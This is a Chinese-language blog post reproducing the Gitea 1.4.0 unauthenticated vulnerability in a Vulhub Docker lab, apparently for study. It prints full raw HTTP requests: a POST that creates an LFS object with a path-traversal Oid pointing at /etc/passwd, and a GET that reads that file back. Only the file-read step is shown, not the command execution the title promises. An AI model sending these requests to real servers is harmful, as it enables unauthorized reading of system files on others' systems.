【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞

一、漏洞描述

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。

二、影响版本

1.4.0

三、环境准备&&漏洞复现

Vulhub进行搭建

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安装镜像docker-compose up -d

环境启动成功

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞1

初始化配置:

http://192.168.1.108:3000/install

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞2

其他默认设置一下管理员账户密码:

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞3

初始化完成成功进去面板

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞4

安装完成后,新建一个用户,然后创建一个公开的仓库

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞5

创建一个公开的仓库

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞6

仓库创建成功

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞7

需要重启一下重启gitea服务

docker-compose restart

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞8

漏洞验证:

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞9

具体数据包:

POST/lostworld/getpasswd.git/info/lfs/objectsHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: application/vnd.git-lfs+jsonAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=lA-gqD5gapHJeeQEz_XUOsejTSY6MTYwOTk4NzQ3MTAwNDc0MzE3OQ%3D%3DConnection: closeContent-Length: 153​{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}

出现401说明发送数据包LFS对象已经创建成功,且其Oid为……/../../etc/passwd。

访问路径

http://192.168.1.108:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

【漏洞分析】完整复现Gitea 1.4 未授权远程代码执行漏洞10

具体读取数据包

GET/lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sthHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=19fae7187e6a86e2; _csrf=y0uGd4qsOuq8esEW9S4hXHWRGHo6MTYwOTk4ODAwNzczODc4NzI3MQ%3D%3DConnection: close

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论